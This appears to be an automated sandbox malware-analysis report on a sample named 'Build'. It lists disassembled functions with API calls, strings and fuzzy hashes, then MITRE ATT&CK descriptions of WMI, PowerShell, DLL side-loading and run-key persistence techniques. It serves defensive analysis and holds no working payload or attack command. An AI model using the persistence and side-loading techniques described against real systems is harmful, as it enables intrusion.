Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: ab6ff7c6f628c195532b92dda7306aa895c357c55817dc048104f69a603a7398
Instruction ID: f0459bc3d7a9d20446a383fdd22389cb5838ecd8c84e23cc1bfff8d099417bc0
Opcode Fuzzy Hash: ab6ff7c6f628c195532b92dda7306aa895c357c55817dc048104f69a603a7398
Instruction Fuzzy Hash: 1F118732644301BFD6219F68DD46F6A3FEAFB4BB42F0004D4FA41A71A8CB616E0D9765

Function 00B600EF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 00B6012E, 00B60162
RENAMEDLG, xrefs: 00B60143

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 81e9c6dd9b204a16673fa761b46f23c1aeba1a8f8ead613a746ef2fbb4998047
Instruction ID: 30055410a9ad23a6770f6412aab3017594dc8a8c729f42e36b0cf8996af6b563
Opcode Fuzzy Hash: 81e9c6dd9b204a16673fa761b46f23c1aeba1a8f8ead613a746ef2fbb4998047
Instruction Fuzzy Hash: 5401D471618209EFD7115F29EC88B677FE8FB06750F0440A5F905A3270DF318890DBA0

Function 00B44B3D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00B44B42

Part of subcall function 00B6106D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B61079
Part of subcall function 00B6106D: ___delayLoadHelper2@8.DELAYIMP ref: 00B6109F

std::_Xinvalid_argument.LIBCPMT ref: 00B44B4D

Strings

vector too long, xrefs: 00B44B48
string too long, xrefs: 00B44B3D

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
String ID: string too long$vector too long
API String ID: 2355824318-1617939282
Opcode ID: f78e0ab14cfae1441c62f4556e1d0964136a7c046db19cf7919f19e683d5aa3d
Instruction ID: f39eb1808db7673b26f78f9b91ad7c30d0ae5efc9597c0dda77fc89484e6706e
Opcode Fuzzy Hash: f78e0ab14cfae1441c62f4556e1d0964136a7c046db19cf7919f19e683d5aa3d
Instruction Fuzzy Hash: E4F0A0312007046B8A34AF59DC45E4AB3FDEF84B2072009AAF985C3601D3B0EA5487F1

Function 00B6C06A Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00B6C0F5
__alldvrm.LIBCMT ref: 00B6C2F6
__alldvrm.LIBCMT ref: 00B6C318

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: d14ae59a6c47695d102f38ce8bebab2561187863f3de3b9f7c7780fcd14afeb7
Instruction ID: f9aa518c21032dfa72a468b661609da311c78ceca2313bbed843ae0f84b9c45c
Opcode Fuzzy Hash: d14ae59a6c47695d102f38ce8bebab2561187863f3de3b9f7c7780fcd14afeb7
Instruction Fuzzy Hash: D1A127729003869FDB15CF58C8A17BEBFE4EF52350F2881E9E9D5AB242C23C8941C755

Function 00B4C142 Relevance: 6.1, APIs: 4, Instructions: 135filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,?,?,00B49343,?,?,?), ref: 00B4C1EE
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,?,00B49343,?,?), ref: 00B4C22C
SetFileTime.KERNEL32(00000800,?,?,00000000,?,?,?,00B49343,?,?,?,?,?,?,?,?), ref: 00B4C2AF
CloseHandle.KERNEL32(00000800,?,?,?,00B49343,?,?,?,?,?,?,?,?,?,?), ref: 00B4C2B6

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: e4fc8899927e708a54bc05e1820c9a5abb313c28bcdc23df043bc984bb0cb79d
Instruction ID: 9eed82e69a10cb07e3cb8e76a8067cc32687de202f5a29a25642499ad5a28c2d
Opcode Fuzzy Hash: e4fc8899927e708a54bc05e1820c9a5abb313c28bcdc23df043bc984bb0cb79d
Instruction Fuzzy Hash: 1C41D530249381AEE361DF64DC41FABBBE8AF89B00F04099DF5D597181DAA49B489752

Function 00B410E0 Relevance: 6.1, APIs: 4, Instructions: 129COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B41136
_wcslen.LIBCMT ref: 00B4115A
_wcslen.LIBCMT ref: 00B41187
_wcslen.LIBCMT ref: 00B411AC

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: f9a44febee580e86ec21ad1f5ca14b8ddb6a083778f1d93d98f3882b88bff9f0
Instruction ID: b179e0ec37cbd4596edc38321d786c6fce599a4be5f6d9b5507af356f0a96ff4
Opcode Fuzzy Hash: f9a44febee580e86ec21ad1f5ca14b8ddb6a083778f1d93d98f3882b88bff9f0
Instruction Fuzzy Hash: 7D418171A087519FC725DF38CD45A9FBBE8EF85300F00496DF989D3250DB34A9498B96

Function 00B4BD61 Relevance: 6.1, APIs: 4, Instructions: 126COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B4BD93
_wcslen.LIBCMT ref: 00B4BDB6
_wcslen.LIBCMT ref: 00B4BE4C
_wcslen.LIBCMT ref: 00B4BEB1

Part of subcall function 00B4C37A: FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,00B487BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 00B4C3A5

Part of subcall function 00B4BBFF: RemoveDirectoryW.KERNEL32(00000001,?,00000001,00000000), ref: 00B4BC1C
Part of subcall function 00B4BBFF: RemoveDirectoryW.KERNEL32(?,00000001,?,00000800), ref: 00B4BC48

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: _wcslen$DirectoryRemove$CloseFind
String ID:
API String ID: 973666142-0
Opcode ID: 4ef4e69a826f42650d5a1cb75a06a5b08f25aa4cb0475b83f4213f082ab1169e
Instruction ID: db49e116b52de857a49f12ad24e24650f0ce17cd1e761953397811abb416829d
Opcode Fuzzy Hash: 4ef4e69a826f42650d5a1cb75a06a5b08f25aa4cb0475b83f4213f082ab1169e
Instruction Fuzzy Hash: E641D97254439096CB30AB648845EFBB3E9DFC4300F444C9AEB8993141DB74DE88D791

Function 00B5C5F3 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00B5C5F6
GetDeviceCaps.GDI32(00000000,00000058), ref: 00B5C605
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B5C613
ReleaseDC.USER32(00000000,00000000), ref: 00B5C621

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 7b190080aa03ce859b3e56c616c7d7b02c6f1cab5a35f23f73073ee6527dcdc9
Instruction ID: bbd117c5d46ce853a198d861ab53165f896d21f5edda24bf93af798fce3a7fe6
Opcode Fuzzy Hash: 7b190080aa03ce859b3e56c616c7d7b02c6f1cab5a35f23f73073ee6527dcdc9
Instruction Fuzzy Hash: 81E0EC719CD660ABD3215B60AC1EF963FA4EB1A713F040045FA01A72A0CEB088458FE1

Function 00B5C79C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 240COMMON

Download Yara Rule

APIs

Part of subcall function 00B5C629: GetDC.USER32(00000000), ref: 00B5C62D
Part of subcall function 00B5C629: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B5C638
Part of subcall function 00B5C629: ReleaseDC.USER32(00000000,00000000), ref: 00B5C643

GetObjectW.GDI32(?,00000018,?), ref: 00B5C7E0

Part of subcall function 00B5CA67: GetDC.USER32(00000000), ref: 00B5CA70
Part of subcall function 00B5CA67: GetObjectW.GDI32(?,00000018,?), ref: 00B5CA9F
Part of subcall function 00B5CA67: ReleaseDC.USER32(00000000,?), ref: 00B5CB37

Strings

(, xrefs: 00B5C935

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 9fbe87e46f72e8db067d81cca0fbecda5a483a48785fb9304d9ea84acae680f6
Instruction ID: 98b11b8bab7ea8a49d4c3eef1a52fad3574f7ddd99ae43f440df0f661f129d7e
Opcode Fuzzy Hash: 9fbe87e46f72e8db067d81cca0fbecda5a483a48785fb9304d9ea84acae680f6
Instruction Fuzzy Hash: 5191F2716087549FD614DF29C844A2BBBE9FF89B01F00499EF98AD3260DB70AD45CF62

Function 00B5D76E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B5D7D1
_wcslen.LIBCMT ref: 00B5D7EC

Strings

}, xrefs: 00B5D7C4

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: 4cba24a25cf7544991b65ba30987a3b56e1b7da38e79bfd25f288db99d56b850
Instruction ID: bb9de984af3e1267c3246cc9afe825b54156b0149b16c0311c70087061b1eae6
Opcode Fuzzy Hash: 4cba24a25cf7544991b65ba30987a3b56e1b7da38e79bfd25f288db99d56b850
Instruction Fuzzy Hash: 3121AF329087455AE731EB64D845B6BB3EDEB84711F440AEAFA44C3241EA74ED4C87E2

Function 00B4D8AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00B4D8D3

Part of subcall function 00B44C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B44C13

Strings

%c:\, xrefs: 00B4D8C9

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: 04d04b931e1fc762d8bcacd58d02c003c7a42e2989248b71e8fdcafac7ce763a
Instruction ID: 1bdc94fdd23440c71f9c1c26427eaff35909a7e77046c74647497f06f090a3b5
Opcode Fuzzy Hash: 04d04b931e1fc762d8bcacd58d02c003c7a42e2989248b71e8fdcafac7ce763a
Instruction Fuzzy Hash: EE0124635047117ADB306BB59C86D7FA7ECEED9360B40849AF484C2183EA24DA40D2B1

Function 00B41366 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00B50244: _swprintf.LIBCMT ref: 00B50284
Part of subcall function 00B50244: _strlen.LIBCMT ref: 00B502A5
Part of subcall function 00B50244: SetDlgItemTextW.USER32(?,00B82274,?), ref: 00B502FE
Part of subcall function 00B50244: GetWindowRect.USER32(?,?), ref: 00B50334
Part of subcall function 00B50244: GetClientRect.USER32(?,?), ref: 00B50340

GetDlgItem.USER32(00000000,00003021), ref: 00B413AA
SetWindowTextW.USER32(00000000,00B765F4), ref: 00B413C0

Strings

0, xrefs: 00B41369

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: cde86e5a7f9c0a0a5ea74f19db2abe20b945d9976afbc04fafea988ba1c496b3
Instruction ID: 356cd38fae92bc2080e3939de979f385f7a424a6e3817bdafd92fa927606047d
Opcode Fuzzy Hash: cde86e5a7f9c0a0a5ea74f19db2abe20b945d9976afbc04fafea988ba1c496b3
Instruction Fuzzy Hash: E8F0AF3054824CBADF152F259C0DBE93BE8EB01314F0489D4FC49519A1DBB5CAD4FB54

Function 00B530CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00B531E7,?,?,00B5325F,?,?,?,?,?,00B53249), ref: 00B530D0
GetLastError.KERNEL32(?,?,00B5325F,?,?,?,?,?,00B53249), ref: 00B530DC

Part of subcall function 00B47BAD: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B47BD5

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00B530E5

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: f4ee42da3de36d240687c6258ce59eabec575cf63909568e715467f7912410d9
Instruction ID: 21048c3c8dfe842cf6af605a30aeb339c3d41b1506e0feb084d68f99146daaef
Opcode Fuzzy Hash: f4ee42da3de36d240687c6258ce59eabec575cf63909568e715467f7912410d9
Instruction Fuzzy Hash: CAD05E3298C93037D61133245C5AD6E3A89EB62732F6047D4F53D6A2F5CF604E8192D1

Function 00B501FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00B4F951,?), ref: 00B501FF
FindResourceW.KERNEL32(00000000,RTL,00000005,?,00B4F951,?), ref: 00B5020D

Strings

RTL, xrefs: 00B50207

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: af8f500b3806c75fc6d4641aabe19f0ce4af83be4edeec4165b307708ff40b6b
Instruction ID: 51ca99be4c210d5a74848323d12a08d6cee99c8098ebca407ecc7faebcaaa92f
Opcode Fuzzy Hash: af8f500b3806c75fc6d4641aabe19f0ce4af83be4edeec4165b307708ff40b6b
Instruction Fuzzy Hash: C1C01231240B5156D63167716C4DB832FA4AB00711F050488F549EB1D0DAE6C8C58A60

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
